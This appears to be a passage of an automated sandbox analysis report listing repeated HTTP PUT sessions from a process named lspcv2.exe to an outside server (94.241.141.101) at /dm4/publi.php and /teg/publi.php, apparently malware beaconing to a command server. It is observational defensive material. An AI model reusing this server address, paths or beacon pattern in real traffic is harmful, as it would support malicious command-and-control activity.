                                                                                                                  Nov 14, 2024 15:01:13.346204996 CET199OUTPUT /dm4/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:01:13.351130009 CET25OUTData Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:01:14.232203960 CET166INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:14 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  66192.168.2.45001794.241.141.101803220C:\Intrumental\lspcv2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 14, 2024 15:01:13.437625885 CET199OUTPUT /dm4/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:01:13.442596912 CET25OUTData Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:01:14.320833921 CET166INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:14 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  67192.168.2.45002194.241.141.101807912C:\Intrumental\lspcv2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 14, 2024 15:01:14.094233990 CET199OUTPUT /teg/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:01:14.101937056 CET25OUTData Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:01:14.973814964 CET166INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:14 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  68192.168.2.45002494.241.141.101804020C:\Intrumental\lspcv2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 14, 2024 15:01:14.358783007 CET199OUTPUT /dm4/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:01:14.367480040 CET25OUTData Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:01:15.265748024 CET166INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:15 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  69192.168.2.45002594.241.141.101803220C:\Intrumental\lspcv2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 14, 2024 15:01:14.441220045 CET199OUTPUT /dm4/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:01:14.447587967 CET25OUTData Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:01:15.325099945 CET166INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:15 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  70192.168.2.45003094.241.141.101807912C:\Intrumental\lspcv2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 14, 2024 15:01:15.084836960 CET199OUTPUT /teg/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:01:15.089785099 CET25OUTData Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:01:15.969883919 CET166INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:15 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  71192.168.2.45003294.241.141.101804020C:\Intrumental\lspcv2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 14, 2024 15:01:15.389578104 CET199OUTPUT /dm4/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:01:15.394448042 CET25OUTData Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:01:16.278683901 CET166INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:16 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  72192.168.2.45003594.241.141.101803220C:\Intrumental\lspcv2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 14, 2024 15:01:15.452912092 CET199OUTPUT /dm4/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:01:15.458636045 CET25OUTData Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:01:16.334810019 CET166INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:16 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  73192.168.2.45003894.241.141.101807912C:\Intrumental\lspcv2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 14, 2024 15:01:16.088884115 CET199OUTPUT /teg/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:01:16.093806982 CET25OUTData Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:01:16.980257988 CET166INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:16 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  74192.168.2.45004294.241.141.101804020C:\Intrumental\lspcv2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 14, 2024 15:01:16.406286001 CET199OUTPUT /dm4/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:01:16.414052010 CET25OUTData Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:01:17.305704117 CET166INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:17 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  75192.168.2.45004394.241.141.101803220C:\Intrumental\lspcv2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 14, 2024 15:01:16.455104113 CET199OUTPUT /dm4/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:01:16.465590954 CET25OUTData Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:01:17.359330893 CET166INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:17 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  76192.168.2.45004794.241.141.101807912C:\Intrumental\lspcv2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 14, 2024 15:01:17.104305983 CET199OUTPUT /teg/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:01:17.109183073 CET25OUTData Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:01:17.985040903 CET166INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:17 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  77192.168.2.45005094.241.141.101804020C:\Intrumental\lspcv2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 14, 2024 15:01:17.426950932 CET199OUTPUT /dm4/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:01:17.431871891 CET25OUTData Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:01:18.330624104 CET166INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:18 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  78192.168.2.45005194.241.141.101803220C:\Intrumental\lspcv2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 14, 2024 15:01:17.484289885 CET199OUTPUT /dm4/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:01:17.489196062 CET25OUTData Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:01:18.380889893 CET166INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:18 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  79192.168.2.45005794.241.141.101807912C:\Intrumental\lspcv2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 14, 2024 15:01:18.104408979 CET199OUTPUT /teg/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:01:18.109381914 CET25OUTData Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:01:18.997750044 CET166INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:18 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  80192.168.2.45005894.241.141.101804020C:\Intrumental\lspcv2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 14, 2024 15:01:18.459305048 CET199OUTPUT /dm4/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:01:18.466043949 CET25OUTData Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:01:19.330444098 CET166INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:19 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  81192.168.2.45005994.241.141.101803220C:\Intrumental\lspcv2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 14, 2024 15:01:18.507278919 CET199OUTPUT /dm4/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:01:18.512321949 CET25OUTData Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:01:19.436356068 CET166INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:19 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  82192.168.2.45006694.241.141.101807912C:\Intrumental\lspcv2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 14, 2024 15:01:19.120625019 CET199OUTPUT /teg/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:01:19.125715971 CET25OUTData Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:01:20.016576052 CET166INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:19 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  83192.168.2.45006794.241.141.101804020C:\Intrumental\lspcv2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 14, 2024 15:01:19.454828024 CET199OUTPUT /dm4/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:01:19.460321903 CET25OUTData Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:01:20.336534023 CET166INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:20 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  84192.168.2.45006994.241.141.10180
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 14, 2024 15:01:19.565710068 CET199OUTPUT /dm4/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:01:19.570830107 CET25OUTData Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:01:20.447848082 CET166INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:20 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  85192.168.2.45007494.241.141.101807912C:\Intrumental\lspcv2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 14, 2024 15:01:20.136226892 CET199OUTPUT /teg/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:01:20.141629934 CET25OUTData Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:01:21.052283049 CET166INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:20 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  86192.168.2.45007694.241.141.101804020C:\Intrumental\lspcv2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 14, 2024 15:01:20.466398001 CET199OUTPUT /dm4/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:01:20.472464085 CET25OUTData Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:01:21.365436077 CET166INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:21 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  87192.168.2.45007894.241.141.101803220C:\Intrumental\lspcv2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 14, 2024 15:01:20.588063002 CET199OUTPUT /dm4/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:01:20.596529007 CET25OUTData Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:01:21.469060898 CET166INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:21 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  88192.168.2.45008294.241.141.101807912C:\Intrumental\lspcv2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 14, 2024 15:01:21.167289019 CET199OUTPUT /teg/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:01:21.173734903 CET25OUTData Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:01:22.051029921 CET166INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:21 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  89192.168.2.45008594.241.141.101804020C:\Intrumental\lspcv2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 14, 2024 15:01:21.485507011 CET199OUTPUT /dm4/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:01:21.490469933 CET25OUTData Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:01:22.361598969 CET166INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:22 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  90192.168.2.45008794.241.141.101803220C:\Intrumental\lspcv2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 14, 2024 15:01:21.600435019 CET199OUTPUT /dm4/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:01:21.605362892 CET25OUTData Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:01:22.469089985 CET166INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:22 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
